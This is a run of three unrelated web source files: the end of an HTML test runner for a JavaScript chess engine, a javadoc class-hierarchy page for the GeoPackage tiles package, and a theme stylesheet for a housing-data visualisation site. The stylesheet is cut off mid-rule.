<script src="../../src/piece.js"></script>
<script src="../../src/position.js"></script>
<script src="../../src/boardTraveler.js"></script>
<script src="../../src/engine.js"></script>
<script src="../../src/boardMover.js"></script>
<script src="../../src/longNotation.js"></script>
<!-- Tests -->
<script src="squareTest.js"></script>
<script src="moveTest.js"></script>
<script src="pieceTest.js"></script>
<script src="positionTest.js"></script>
<script src="boardTravelerTest.js"></script>
<script src="engineTest.js"></script>
<script src="boardMoverTest.js"></script>
<script src="longNotationTest.js"></script>
</body>
</html>
|
docs/docs/api/mil/nga/geopackage/tiles/package-tree.html
|
ngageoint/geopackage-core-java
|
<!DOCTYPE HTML>
<!-- NewPage -->
<html lang="en">
<head>
<!-- Generated by javadoc (11.0.13) on Thu Feb 03 14:46:53 MST 2022 -->
<title>mil.nga.geopackage.tiles Class Hierarchy (GeoPackage Core 6.2.0 API)</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta name="dc.created" content="2022-02-03">
<link rel="stylesheet" type="text/css" href="../../../../stylesheet.css" title="Style">
<link rel="stylesheet" type="text/css" href="../../../../jquery/jquery-ui.css" title="Style">
<script type="text/javascript" src="../../../../script.js"></script>
<script type="text/javascript" src="../../../../jquery/jszip/dist/jszip.min.js"></script>
<script type="text/javascript" src="../../../../jquery/jszip-utils/dist/jszip-utils.min.js"></script>
<!--[if IE]>
<script type="text/javascript" src="../../../../jquery/jszip-utils/dist/jszip-utils-ie.min.js"></script>
<![endif]-->
<script type="text/javascript" src="../../../../jquery/jquery-3.5.1.js"></script>
<script type="text/javascript" src="../../../../jquery/jquery-ui.js"></script>
</head>
<body>
<script type="text/javascript"><!--
try {
if (location.href.indexOf('is-external=true') == -1) {
parent.document.title="mil.nga.geopackage.tiles Class Hierarchy (GeoPackage Core 6.2.0 API)";
}
}
catch(err) {
}
//-->
var pathtoroot = "../../../../";
var useModuleDirectories = true;
loadScripts(document, 'script');</script>
<noscript>
<div>JavaScript is disabled on your browser.</div>
</noscript>
<header role="banner">
<nav role="navigation">
<div class="fixedNav">
<!-- ========= START OF TOP NAVBAR ======= -->
<div class="topNav"><a id="navbar.top">
<!-- -->
</a>
<div class="skipNav"><a href="#skip.navbar.top" title="Skip navigation links">Skip navigation links</a></div>
<a id="navbar.top.firstrow">
<!-- -->
</a>
<ul class="navList" title="Navigation">
<li><a href="../../../../index.html">Overview</a></li>
<li><a href="package-summary.html">Package</a></li>
<li>Class</li>
<li>Use</li>
<li class="navBarCell1Rev">Tree</li>
<li><a href="../../../../deprecated-list.html">Deprecated</a></li>
<li><a href="../../../../index-all.html">Index</a></li>
<li><a href="../../../../help-doc.html">Help</a></li>
</ul>
</div>
<div class="subNav">
<ul class="navList" id="allclasses_navbar_top">
<li><a href="../../../../allclasses.html">All Classes</a></li>
</ul>
<ul class="navListSearch">
<li><label for="search">SEARCH:</label>
<input type="text" id="search" value="search" disabled="disabled">
<input type="reset" id="reset" value="reset" disabled="disabled">
</li>
</ul>
<div>
<script type="text/javascript"><!--
allClassesLink = document.getElementById("allclasses_navbar_top");
if(window==top) {
allClassesLink.style.display = "block";
}
else {
allClassesLink.style.display = "none";
}
//-->
</script>
<noscript>
<div>JavaScript is disabled on your browser.</div>
</noscript>
</div>
<a id="skip.navbar.top">
<!-- -->
</a></div>
<!-- ========= END OF TOP NAVBAR ========= -->
</div>
<div class="navPadding"> </div>
<script type="text/javascript"><!--
$('.navPadding').css('padding-top', $('.fixedNav').css("height"));
//-->
</script>
</nav>
</header>
<main role="main">
<div class="header">
<h1 class="title">Hierarchy For Package mil.nga.geopackage.tiles</h1>
<span class="packageHierarchyLabel">Package Hierarchies:</span>
<ul class="horizontal">
<li><a href="../../../../overview-tree.html">All Packages</a></li>
</ul>
</div>
<div class="contentContainer">
<section role="region">
<h2 title="Class Hierarchy">Class Hierarchy</h2>
<ul>
<li class="circle">java.lang.<a href="https://docs.oracle.com/en/java/javase/11/docs/api/java.base/java/lang/Object.html?is-external=true" title="class or interface in java.lang" class="externalLink"><span class="typeNameLink">Object</span></a>
<ul>
<li class="circle">mil.nga.geopackage.tiles.<a href="TileBoundingBoxUtils.html" title="class in mil.nga.geopackage.tiles"><span class="typeNameLink">TileBoundingBoxUtils</span></a></li>
<li class="circle">mil.nga.geopackage.tiles.<a href="TileGrid.html" title="class in mil.nga.geopackage.tiles"><span class="typeNameLink">TileGrid</span></a></li>
</ul>
</li>
</ul>
</section>
</div>
</main>
<footer role="contentinfo">
<nav role="navigation">
<!-- ======= START OF BOTTOM NAVBAR ====== -->
<div class="bottomNav"><a id="navbar.bottom">
<!-- -->
</a>
<div class="skipNav"><a href="#skip.navbar.bottom" title="Skip navigation links">Skip navigation links</a></div>
<a id="navbar.bottom.firstrow">
<!-- -->
</a>
<ul class="navList" title="Navigation">
<li><a href="../../../../index.html">Overview</a></li>
<li><a href="package-summary.html">Package</a></li>
<li>Class</li>
<li>Use</li>
<li class="navBarCell1Rev">Tree</li>
<li><a href="../../../../deprecated-list.html">Deprecated</a></li>
<li><a href="../../../../index-all.html">Index</a></li>
<li><a href="../../../../help-doc.html">Help</a></li>
</ul>
</div>
<div class="subNav">
<ul class="navList" id="allclasses_navbar_bottom">
<li><a href="../../../../allclasses.html">All Classes</a></li>
</ul>
<div>
<script type="text/javascript"><!--
allClassesLink = document.getElementById("allclasses_navbar_bottom");
if(window==top) {
allClassesLink.style.display = "block";
}
else {
allClassesLink.style.display = "none";
}
//-->
</script>
<noscript>
<div>JavaScript is disabled on your browser.</div>
</noscript>
</div>
<a id="skip.navbar.bottom">
<!-- -->
</a></div>
<!-- ======== END OF BOTTOM NAVBAR ======= -->
</nav>
<p class="legalCopy"><small>Copyright © 2022 <a href="https://www.nga.mil/">National Geospatial-Intelligence Agency</a>. All rights reserved.</small></p>
</footer>
</body>
</html>
|
funda/css/main.css
|
ibeerepoot/Programmeerproject
|
/*
Theme Name: Triangle
Theme Uri: http://www.themeum.com
Author: Themeum
Author Uri: http://www.themeum.com
Description: Creative Site Template
Version: 1.1
*/
/*
Custom CSS Iris
*/
#pieChart svg:not(:root) {
width: 650px;
height: 650px;
}
#map svg:not(:root) {
width: inherit;
height: inherit;
}
#icoontjes img, #icoontjes h2 {
opacity: 0.5;
}
#icoontjes img:hover, #icoontjes h2:hover {
opacity: 1.0;
}
#verkopers {
margin-bottom: 50px;
}
#choro {
display: none;
margin-top: 50px;
}
#choro-info {
text-align: left;
}
.checkbox label {
font-family: "Lato";
font-weight: 300;
}
#verkoopinfo {
width: 100%;
}
#verkoopinfo {
display: none;
}
#verkoopinfo .form-group button {
display: none;
}
#verkopers-stap-2 {
display: none;
}
#verkoopinfo .form-group label {
display: inline;
}
#verkoopinfo .form-group input {
display: inline;
width: 200px;
}
#verkoopinfo img {
margin-bottom: 100px;
}
#verkoopinfo input[type=radio] {
position: relative;
}
#map {
height: 700px;
display: none;
}
.info {
padding: 6px 8px;
font: 14px/16px Arial, Helvetica, sans-serif;
background: white;
background: rgba(255,255,255,0.8);
box-shadow: 0 0 15px rgba(0,0,0,0.2);
border-radius: 5px;
}
.info h4 {
margin: 0 0 5px;
color: #777;
}
.legend {
line-height: 18px;
color: #555;
text-align: left;
}
.legend i {
width: 18px;
height: 18px;
float: left;
margin-right: 8px;
opacity: 0.7;
}
#kopers .radio-list {
display: none;
}
.radio-inline {
font-family: 'Lato', sans-serif;
font-weight: 300;
}
#kopers .radio-inline {
font-size: 15px;
}
#verkopers svg {
width: 100%;
padding: 30px;
}
#verkopers .viz {
height: 300px;
width: 90%;
}
#viz svg rect:hover {
stroke-width: 2!important;
}
.axis path,
.axis line {
fill: none;
stroke: #000;
shape-rendering: crispEdges;
}
@import url(http://fonts.googleapis.com/css?family=Lato:100,300,400,700);
@import url(http://fonts.googleapis.com/css?family=Open+Sans:300italic,400italic,600italic,700italic,400,300,600,700);
@import url(http://fonts.googleapis.com/css?family=Noto+Sans:400,700);
body {
background: #fff;
font-family: 'Lato', sans-serif;
font-weight: 300;
font-size: 17px;
line-height: 22px;
color: #000;
}
html {
height: 100%;
}
a{
color:#C03035;
}
a:hover {
outline: none;
text-decoration:none;
color:#4fcccd;
}
a:focus {
outline:none;
outline-offset: 0;
}
a {
-webkit-transition: 300ms;
-moz-transition: 300ms;
-o-transition: 300ms;
transition: 300ms;
}
ul {
list-style: none;
}
h1, h2, h3, h4, h5, h6 {
font-family: 'Lato', sans-serif;
font-weight: 300;
}
h1{
color: #686868;
}
h2{
font-size: 28px;
color: #686868;
}
h3{
font-size: 20px;
}
.overflow{
overflow: hidden;
}
.uppercase{
text-transform: uppercase;
}
.btn-common {
font-size: 14px;
color: #0099ae;
border: 1px solid #0099ae;
font-family: 'Open Sans', sans-serif;
font-weight: 300;
padding: 10px 25px;
background-color: #fff;
}
#action .col-sm-5{
position: absolute;
top: 0;
height: 100%;
right: 0;
}
.btn-common:hover,
.btn-common:focus{
outline: none;
background: none;
box-shadow: none;
color: #01707f;
border-color:#01707f;
}
.align-right{
text-align: right;
}
.inline{
display: inline-block;
}
.padding{
padding: 65px 0;
}
.padding-bottom{
padding-bottom: 65px;
}
.padding-top{
padding-top: 90px;
}
.padding-right{
padding-right: 80px;
}
.padding-left{
padding-left: 80px;
}
.margin-bottom{
margin-bottom: 35px;
}
.carousel-indicators.visible-xs {
height: 20px;
margin: 0;
padding: 0;
position: absolute;
top: -35px;
width: 100%;
left: 0;
}
.carousel-indicators.visible-xs li {
border-color: #D29948;
border-width: 2px;
height: 12px;
margin: 0 5px 0 0;
width: 12px;
}
.carousel-indicators.visible-xs li.active {
background: rgba(210, 153, 72, 0.7);
}
/*************************
*******Header******
**************************/
#header{
margin-bottom: 0;
padding: 30px 0 60px 0;
}
#header .navbar-inverse .container{
position: relative;
}
.search{
position: absolute;
top: 20px;
right: 0;
z-index: 1;
}
.search i{
color: #00aeef;
cursor: pointer;
position: absolute;
right: 10px;
top: 2px;
}
.field-toggle{
position: relative;
top: 30px;
right: 15px;
display: none;
height: 50px;
}
.search-form{
padding-left: 10px;
height: 40px;
font-size: 18px;
color: #818285;
font-weight: 300;
outline: none;
border: 1px solid #00aeef;
margin-top: 20px;
border-radius: 4px;
}
.social-icons ul li{
padding: 0 10px;
}
.social-icons ul li:last-child{
padding-right: 0;
}
.social-icons ul li a{
font-size: 18px;
color: #d3d3d3;
padding: 0;
}
.social-icons ul li a:hover .fa-facebook {
color:#0884d5;
}
.social-icons ul li a:hover .fa-twitter {
color:#2AA7DC;
}
.social-icons ul li a:hover .fa-google-plus {
color:#A22523;
}
.social-icons ul li a:hover .fa-dribbble {
color:#E94989;
}
.social-icons ul li a:hover .fa-linkedin {
color:#006DC0;
}
.social-icons ul li a:hover,
.social-icons ul li a:focus{
background: none;
}
#header .navbar {
background: #fff;
border: 0;
margin-bottom: 0;
}
#header .navbar-toggle{
margin-top: 20px;
}
#header .navbar-brand{
padding: 0;
margin-left: 0;
}
#header .navbar-brand h1{
padding: 0;
margin: 0;
}
#header .navbar-nav.navbar-right >li:last-child{
margin-right: 20px;
}
#header .navbar-nav.navbar-right >li a {
color: #000;
font-size: 12px;
padding: 20px;
text-transform: uppercase;
font-weight: 300;
}
#header .navbar-inverse .navbar-nav li.active > a,
#header .navbar-inverse .navbar-nav li.active > a:focus,
#header .navbar-nav.navbar-right li > a:hover,
.navbar-inverse .navbar-nav > .open > a {
background-color: inherit;
border: 0;
color: #00aeef;
}
#header .navbar-inverse .navbar-nav li a:hover{
color: #00aeef;
}
/* Dropdown menu*/
ul.sub-menu {
display: none;
list-style: none;
padding: 0;
margin: 0;
}
#header .navbar-nav li ul.sub-menu li a{
color: #818285;
padding: 5px 0;
font-size: 13px;
display: block;
text-transform: capitalize;
}
#header .navbar-nav li ul.sub-menu li .active{
background: #00aeef;
color: #fff;
position: relative;
}
#header .navbar-nav li ul.sub-menu li .active i{
position: absolute;
font-size: 56px;
top: -13px;
color: #0884d5;
}
#header .navbar-nav li ul.sub-menu li .active .fa-angle-right{
left: -3px;
}
#header .navbar-nav li ul.sub-menu li .active .fa-angle-left{
right: -3px;
}
#header .navbar-nav li ul.sub-menu li a:hover,
#header .navbar-nav li ul.sub-menu li a:focus{
background: #00aeef;
color: #fff;
}
.fa-angle-down{
padding-left: 5px;
}
.scaleIn {
-webkit-animation-name: scaleIn;
animation-name: scaleIn;
}
@-webkit-keyframes scaleIn {
0% {
opacity: 0;
-webkit-transform: scale(0);
transform: scale(0);
}
100% {
opacity: 1;
-webkit-transform: scale(1);
transform: scale(1);
}
}
@keyframes scaleIn {
0% {
opacity: 0;
-webkit-transform: scale(0);
-ms-transform: scale(0);
transform: scale(0);
}
100% {
opacity: 1;
-webkit-transform: scale(1);
-ms-transform: scale(1);
transform: scale(1);
}
}
/*************************
*******Footer******
**************************/
#footer {
padding-bottom: 10px;
background-image: url(../images/home/footer.png);
background-repeat: repeat-x;
background-position: bottom;
background-size: contain;
}
#footer h1{
margin-bottom: 65px;
margin-top: 36px;
}
#footer .bottom-separator {
margin-bottom: 60px;
}
#message {
height: 110px;
resize: none;
}
.bottom > h2 {
margin-top: 0;
margin-bottom: 26px;
}
.bottom .media-body h3 {
margin-top: 0;
padding-left: 25px;
}
.bottom .media-body h3 a{
color: #ea2c00;
}
.testimonial .media{
margin-top: 0;
margin-bottom: 25px;
}
.testimonial .media>.pull-left{
margin-right: 25px;
}
.testimonial .media>.pull-left img{
margin-top: 6px;
}
.testimonial .media .media-body blockquote{
padding-left: 25px;
padding-right: 30px;
position: relative;
border-left: 0;
margin-bottom: 0;
}
.testimonial .media .media-body blockquote:before{
position: absolute;
left: 5px;
top: 8px;
content: '"';
font-size: 40px;
color: #ea2c00;
font-family: 'Noto Sans', sans-serif;
transform:rotate(180deg);
-ms-transform:rotate(180deg); /* IE 9 */
-webkit-transform: rotate(180deg); /* Opera, Chrome, and Safari */
line-height: 0;
}
.testimonial .media .media-body blockquote:after{
position: absolute;
right: 30px;
bottom: 14px;
content: '"';
font-size: 40px;
color: #ea2c00;
font-family: 'Noto Sans', sans-serif;
line-height: 0;
}
.contact-info.bottom {
padding-left: 25px;
}
.bottom > address {
line-height: 22px;
margin-bottom: 40px;
}
.form-control {
border: 1px solid #eaeaea;
font-weight: 300;
outline: none;
box-shadow: none;
height: 40px;
}
.form-control:hover,
.form-control:focus{
border-color: #4fcccd;
outline: none;
box-shadow: none;
}
.btn-submit {
width: 100%;
background-color: #4fcccd;
color: #fff;
font-size: 14px;
font-weight: 300;
letter-spacing: 5px;
text-transform: uppercase;
border-radius: 3px;
margin-top: 5px;
border-bottom: 3px solid #2f9697;
box-shadow: none;
padding: 10px;
}
.btn-submit:hover,
.btn-submit:focus{
color: #fff;
outline: none;
box-shadow: none;
opacity: .8;
}
.copyright-text{
margin-top: 70px;
color: #fff;
font-size: 16px;
padding-bottom: 15px;
}
.copyright-text a {
color: #3e848a
}
.copyright-text p {
margin-bottom: 0;
}
/*************************
*******Home Page******
**************************/
#home-slider {
background: url(../images/home/slider-bg.png) 0 100% repeat-x;
position: relative;
}
#home-slider .main-slider {
position: relative;
height: 900px;
}
#home-slider .slide-text{
position: absolute;
top: 100px;
left: 0;
width: 450px;
}
.animate-in .slide-text {
-webkit-animation: fadeInLeftBig 700ms cubic-bezier(0.190,1.000,0.220,1.000) 200ms both;
animation: fadeInLeftBig 700ms cubic-bezier(0.190,1.000,0.220,1.000) 200ms both;
}
#home-slider .slider-hill {
position: absolute;
right: 0;
bottom: 0;
}
.animate-in .slider-hill {
-webkit-animation: bounceInDown 1000ms ease-in-out 200ms both;
animation: bounceInDown 1000ms ease-in-out 200ms both;
}
#home-slider .slider-house {
position: absolute;
right: 110px;
bottom: -30px;
}
.animate-in .slider-house {
-webkit-animation: bounceInDown 500ms ease-in-out 800ms both;
animation: bounceInDown 500ms ease-in-out 800ms both;
}
#home-slider .slider-sun {
position: absolute;
right: 365px;
bottom: 100px;
}
.animate-in .slider-sun {
-webkit-animation: scaleIn 500ms ease-in-out 1200ms both;
animation: scaleIn 500ms ease-in-out 1200ms both;
}
#home-slider .slider-birds1 {
position: absolute;
right: 470px;
bottom: 75px;
}
.animate-in .slider-birds1 {
-webkit-animation: fadeInLeft 500ms ease-in-out 1200ms both;
animation: fadeInLeft 500ms ease-in-out 1200ms both;
}
#home-slider .slider-birds2 {
position: absolute;
right: 40px;
bottom: 150px;
}
.animate-in .slider-birds2 {
-webkit-animation: fadeInRight 500ms ease-in-out 1200ms both;
animation: fadeInRight 500ms ease-in-out 1200ms both;
}
#home-slider h1{
margin-top: 100px;
margin-bottom: 25px;
}
#home-slider .btn-common {
margin-top: 20px;
}
#home-slider .preloader {
position: absolute;
left: 0;
top: 0;
bottom: -30px;
right: 0;
background: #fafafa;
text-align: center;
}
#home-slider .preloader > i {
font-size: 48px;
height: 48px;
line-height: 48px;
color: #00aeef;
position: absolute;
left: 50%;
margin-left: -24px;
top: 50%;
margin-top: -24px;
}
#action {
background-image: url(../images/home/tour-bg.png);
background-color: #fbfafa;
background-repeat: repeat-x;
height: 157px;
background-position: center;
display: table;
position: static;
width: 100%;
}
.vertical-center{
display: table-cell;
vertical-align: middle;
width: 100%;
position: statice;
}
.single-service{
overflow: hidden;
display: block;
}
.single-service img {
margin-bottom: 35px;
}
.single-service .fold {
margin-bottom: 35px;
}
.single-service h2 {
margin-top: 0;
margin-bottom: 15px;
}
.single-service p {
padding: 0 48px;
}
.action h1{
margin-top: 0;
}
.action p{
font-size: 18px;
margin-bottom: 0;
font-weight: 300;
}
.action .btn-common{
margin-top: 55px;
float: left;
}
.title {
color: #404040;
font-weight: 300;
}
.single-features {
overflow: hidden;
padding-top: 65px;
padding-bottom: 40px;
}
.single-features .col-sm-6 {
margin-top: 50px;
}
.single-features:last-child {
padding-bottom: 95px;
padding-top: 0;
}
.single-features h2{
margin-bottom: 15px;
}
#clients{
padding-bottom: 45px;
}
.clients {
margin-top: 100px;
margin-bottom: 100px;
}
.clients img {
display: inline-block;
}
.clients-logo {
overflow: hidden;
margin-bottom: 10px;
}
/*************************
*******About Us Page******
**************************/
#action ,
#page-breadcrumb{
position: relative;
}
#page-breadcrumb {
background-image: url(../images/home/tour-bg.png);
background-color: #fbfafa;
background-repeat: repeat-x;
height: 130px;
background-position: center;
display: table;
position: static;
width: 100%;
}
#team {
padding: 85px 0;
}
#team-carousel {
margin-top: 80px;
}
#company-information .padding-top{
padding-top: 172px;
}
.single-service img {
height: 85px;
}
.tour-button {
background-image: url(../images/home/tour-icon2.png);
height: 100%;
background-repeat: no-repeat;
position: absolute;
width: 100%;
left: 0;
background-position: 151px 4px;
}
.about-image {
padding:90px 90px 0;
}
.team-single {
position: relative;
}
.person-thumb {
position: relative;
}
.person-thumb img {
}
.social-profile {
background: none repeat scroll 0 0 rgba(137, 97, 46, 0.8);
display: none;
position: absolute;
text-align: center;
top: 0;
-webkit-transition: all 0.9s ease;
-moz-transition: all 0.9s ease;
-ms-transition: all 0.9s ease;
-o-transition: all 0.9s ease;
transition: all 0.9s ease;transition: all 0.9s ease 0s;
width: 100%;
height: 100%;
}
.team-single:hover .social-profile{
background:rgba(112, 35, 64, 0.9);
display: block;
-webkit-animation: fadeInUp 400ms;
animation: fadeInUp 400ms;
-webkit-transition: all 0.9s ease;
-moz-transition: all 0.9s ease;
-ms-transition: all 0.9s ease;
-o-transition: all 0.9s ease;
transition: all 0.9s ease;
}
.social-profile .nav-pills {
display: inline-block;
margin-top: -26px;
padding: 0;
position: relative;
top: 50%;
}
.social-profile .nav-pills li {
display: inline-block;
margin: 0 5px;
}
.social-profile .nav-pills li a {
color: #fff;
border: 1px solid #fff;
width: 40px;
height: 40px;
line-height: 40px;
text-align: center;
padding: 0;
border-radius: 40px;
-webkit-transition: all 0.9s ease;
transition: all 0.9s ease;
}
.social-profile .nav-pills li a:hover {
color: #702340;
border-color: #702340;
}
.person-info h2 {
font-weight: 300;
margin-bottom: 5px;
}
.person-info h3 {
font-size: 16px;
color: #686868;
font-weight: 300;
margin-top: 0;
margin-bottom: 0;
}
.team-carousel-control {
position: absolute;
top: 36%;
width: 13px;
height: 16px;
text-indent: -9999999px;
-webkit-transition: all 0.9s ease;
-moz-transition: all 0.9s ease;
-ms-transition: all 0.9s ease;
-o-transition: all 0.9s ease;
transition: all 0.9s ease;
}
.right.team-carousel-control {
right: -50px;
background-image: url(../images/aboutus/right.png);
}
.left.team-carousel-control {
left: -50px;
background-image: url(../images/aboutus/left.png);
}
.team-carousel-control:hover{
background-position: 0 -18px;
-webkit-transition: all 0.5s ease;
-moz-transition: all 0.5s ease;
-ms-transition: all 0.5s ease;
-o-transition: all 0.5s ease;
transition: all 0.5s ease;
}
.count h1{
font-size: 60px;
color: #00aeef;
}
.count h3{
font-size: 16px;
}
.progress .progress-bar.six-sec-ease-in-out {
-webkit-transition: width 1s ease-in-out;
-moz-transition: width 1s ease-in-out;
-ms-transition: width 1s ease-in-out;
-o-transition: width 1s ease-in-out;
transition: width 1s ease-in-out;
}
.top-zero{
margin-top: 0;
}
h3.top-zero{
font-size: 20px;
}
#company-information .about-us h2{
margin-bottom: 45px;
}
.single-skill h3{
font-size: 16px;
}
.progress{
height: 30px;
box-shadow: none;
-webkit-box-shadow: none;
}
.progress-bar{
line-height: 30px;
box-shadow: none;
-webkit-box-shadow: none;
}
.progress-bar.progress-bar-primary{
background: #00aeef;
}
/*************************
*******Service Page******
**************************/
#recent-projects{
padding: 85px 0;
}
.recent-projects .team-single{
height: 355px;
}
.recent-projects p.padding-bottom{
padding-bottom: 50px;
}
.choose{
padding-top: 30px;
}
#company-information.choose .padding-top{
padding-top: 50px;
}
#company-information h2{
margin-bottom: 25px;
margin-top: 0;
}
ul.elements{
list-style: none;
margin: 0;
padding: 0;
}
ul.elements li{
margin: 6px 0;
}
ul.elements li > i{
color:#C03035;
display: inline-block;
margin-right: 10px;
}
#company-information h1.margin-bottom{
margin-bottom: 26px;
}
/*************************
*******Portfolio Default**
**************************/
.portfolio-single {
position: relative;
}
.portfolio-thumb {
position: relative;
}
.portfolio-thumb img {
width: 100%;
}
.portfolio-single:hover .portfolio-view{
display: block;
-webkit-animation: fadeInUp 400ms;
animation: fadeInUp 400ms;
}
#portfolio .row{
margin-left: -10px;
margin-right: -10px;
}
.portfolio-view {
display: none;
position: absolute;
top: 0;
height: 100%;
background:rgba(112, 35, 64, 0.9);
width: 100%;
text-align: center;
}
.portfolio-view .nav-pills {
padding: 0;
display: inline-block;
margin-top: -26px;
top: 50%;
position: relative;
}
.portfolio-view .nav-pills li {
display: inline-block;
margin: 0 5px;
}
.portfolio-view .nav-pills li a {
color: #fff;
border: 1px solid #fff;
width: 40px;
height: 40px;
line-height: 38px;
text-align: center;
padding: 0;
border-radius: 40px;
-webkit-animation: scaleIn 400ms linear 100ms both;
animation: scaleIn 400ms linear 100ms both;
-webkit-transition: all 0.9s ease;
transition: all 0.9s ease;
}
.portfolio-view .nav-pills li a:hover {
color: #702340;
border-color: #702340;
-webkit-transition: all 0.9s ease;
transition: all 0.9s ease;
}
.portfolio-info {
overflow: hidden;
margin-bottom: 30px;
}
.portfolio-info h2 {
font-size: 18px;
margin: 15px 0 0;
}
.portfolio-filter {
margin: 80px 0;
padding: 0;
}
.portfolio-filter li {
display: inline-block;
position: relative;
}
.portfolio-filter li a {
border-radius: 0;
color: #686868;
font-size: 18px;
font-weight: 300;
padding: 0 25px;
text-transform: capitalize;
border: none;
}
.portfolio-filter li .active{
background: transparent;
box-shadow: none;
-webkit-box-shadow: none;
}
.portfolio-filter li a:hover,
.portfolio-filter li a:focus,
.portfolio-filter li a.active {
background: transparent;
box-shadow: none;
-webkit-box-shadow: none;
}
.portfolio-filter li a.active:before{
position: absolute;
content: "";
left: 0;
width: 13px;
height: 16px;
background: url(../images/portfolio/icon.png);
top: 5px;
}
.portfolio-pagination{
text-align: center;
padding-top: 40px;
padding-bottom: 90px;
}
.pagination li{
display: inline-block;
margin: 0 10px;
}
.pagination li a{
color: #000;
padding: 5px 10px;
border-radius: 5px;
border: 1px solid #fff;
}
.pagination li:first-child a{
background: url(../images/portfolio/left.png);
background-repeat: no-repeat;
text-indent: -999999999px;
background-position: center top 10px;
width: 32px;
height: 36px;
border: none;
-webkit-transition: 300ms;
-moz-transition: 300ms;
-o-transition: 300ms;
transition: 300ms;
}
.pagination li:first-child a:hover{
background: url(../images/portfolio/left.png);
background-position: center top -37px;
background-repeat: no-repeat;
-webkit-transition: 300ms;
-moz-transition: 300ms;
-o-transition: 300ms;
transition: 300ms;
}
.pagination li:last-child a{
background: url(../images/portfolio/right.png);
background-repeat: no-repeat;
text-indent: -999999999px;
background-position: center top 10px;
width: 32px;
height: 36px;
border: none;
-webkit-transition: 300ms;
-moz-transition: 300ms;
-o-transition: 300ms;
transition: 300ms;
}
.pagination li:last-child a:hover{
background: url(../images/portfolio/right.png);
background-position: center top -37px;
background-repeat: no-repeat;
-webkit-transition: 300ms;
-moz-transition: 300ms;
-o-transition: 300ms;
transition: 300ms;
}
.pagination li a:hover,
.pagination .active a,
.pagination a:active,
.pagination .active a:hover,
.pagination .active a:focus,
.pagination a:focus {
background: transparent;
border-color: #C03035;
color: #C03035;
}
/*****************************
Portfolio with right sidebar
*****************************/
.sidebar h3 {
color: #404040;
margin-top: 0;
border-bottom: 3px solid #ececec;
margin-bottom: 6px;
padding-bottom: 8px;
}
.sidebar-item{
margin-bottom: 48px;
}
.categories .navbar-stacked li {
border-bottom: 1px solid #ececec;
}
.categories .navbar-stacked li:last-child {
border-bottom: 0px solid #ececec;
}
.categories .navbar-stacked li a {
font-size: 16px;
color: #6a6a6a;
padding: 8px 0;
padding-left: 0;
}
.categories .navbar-stacked li a:hover{
background: none;
margin-left: 20px;
color: #0099AE;
opacity: 1;
}
.categories .navbar-stacked li.active a{
color: #0099AE;
padding-left: 20px;
}
.categories .navbar-stacked li.active a:before{
position: absolute;
content: "";
border-color: transparent transparent transparent #0099AE;
border-width: 8px;
border-style: solid;
left: 0;
top: 13px;
margin-top: 0;
z-index: 0;
transition: all 0.3s ease 0s;
-moz-transition: all 0.3s ease 0s;
-webkit-transition: all 0.3s ease 0s;
-o-transition: all 0.3s ease 0s;
}
.categories .navbar-stacked li.active a:after {
position: absolute;
content: "";
border-color: transparent transparent transparent #fff;
border-width: 6px;
border-style: solid;
left: 0px;
top: 15px;
margin-top: 0;
z-index: 1;
transition: all 0.3s ease 0s;
-moz-transition: all 0.3s ease 0s;
-webkit-transition: all 0.3s ease 0s;
-o-transition: all 0.3s ease 0s;
}
.sidebar-item .media{
border-bottom: 1px solid #ececec;
padding-bottom: 10px;
padding-top: 21px;
margin-top: 0;
transition: all 0.3s ease 0s;
-moz-transition: all 0.3s ease 0s;
-webkit-transition: all 0.3s ease 0s;
-o-transition: all 0.3s ease 0s;
}
.sidebar-item .media:last-child{
border-bottom: 0px solid #ececec;
padding-bottom: 0;
}
.sidebar-item .media:hover{
border-left: 2px solid #0099AE;
padding-left: 5px;
transition: all 0.3s ease 0s;
-moz-transition: all 0.3s ease 0s;
-webkit-transition: all 0.3s ease 0s;
-o-transition: all 0.3s ease 0s;
}
.sidebar-item .media:hover.media .media-body h4 a{
color: #0099AE;
transition: all 0.3s ease 0s;
-moz-transition: all 0.3s ease 0s;
-webkit-transition: all 0.3s ease 0s;
-o-transition: all 0.3s ease 0s;
}
.sidebar-item .media .media-body h4 {
margin-top: 0;
margin-bottom: 8px;
}
.sidebar-item .media .media-body h4 a{
color: #7d7d7d;
font-size: 16px;
}
.sidebar-item .media .media-body p {
color: #b4b4b4;
font-size: 12px;
}
.tag-cloud .nav-pills{
margin-top: 16px;
}
.tag-cloud .nav-pills li{
margin: 0;
margin-top: 6px;
margin-right: 4px;
}
.tag-cloud .nav-pills li a{
font-size: 14px;
font-weight: 300;
padding: 5px 15px;
background: #bbbbbb;
color: #fff;
border-radius: 3px;
}
.tag-cloud .nav-pills li a:hover{
background: #0099AE;
}
.popular ul.gallery {
margin: 0;
padding: 0;
list-style: none;
margin: 10px -8px;
}
.popular ul.gallery li {
display: block;
width: 33.33%;
float: left;
padding: 8px;
}
.popular ul.gallery li a {
display: block;
}
.popular ul.gallery li a img {
width: 100%;
transition: border-radius 300ms ease-in;
-webkit-transition: border-radius 300ms ease-in;
}
.popular ul.gallery li a img:hover {
border-radius: 60px;
}
/* Start: Recommended Isotope styles */
/**** Isotope Filtering ****/
.isotope-item {
z-index: 2;
}
.isotope-hidden.isotope-item {
pointer-events: none;
z-index: 1;
}
/**** Isotope CSS3 transitions ****/
.isotope,
.isotope .isotope-item {
-webkit-transition-duration: 0.8s;
-moz-transition-duration: 0.8s;
-ms-transition-duration: 0.8s;
-o-transition-duration: 0.8s;
transition-duration: 0.8s;
}
.isotope {
-webkit-transition-property: height, width;
-moz-transition-property: height, width;
-ms-transition-property: height, width;
-o-transition-property: height, width;
transition-property: height, width;
}
.isotope .isotope-item {
-webkit-transition-property: -webkit-transform, opacity;
-moz-transition-property: -moz-transform, opacity;
-ms-transition-property: -ms-transform, opacity;
-o-transition-property: -o-transform, opacity;
transition-property: transform, opacity;
}
/**** disabling Isotope CSS3 transitions ****/
.isotope.no-transition,
.isotope.no-transition .isotope-item,
.isotope .isotope-item.no-transition {
-webkit-transition-duration: 0s;
-moz-transition-duration: 0s;
-ms-transition-duration: 0s;
-o-transition-duration: 0s;
transition-duration: 0s;
}
/*****************************
Portfolio Details
*****************************/
#portfolio-information.padding-top{
padding-top: 100px;
}
.project-name h2{
margin-top: 0;
margin-bottom: 15px;
}
#related-work .title{
margin-bottom: 55px;
margin-top: 10px;
}
.navbar-default {
background: none;
padding: 0;
}
.navbar-default li a{
font-size: 12px;
padding: 0;
padding-right: 15px;
}
.navbar-default li a i{
padding-right: 8px;
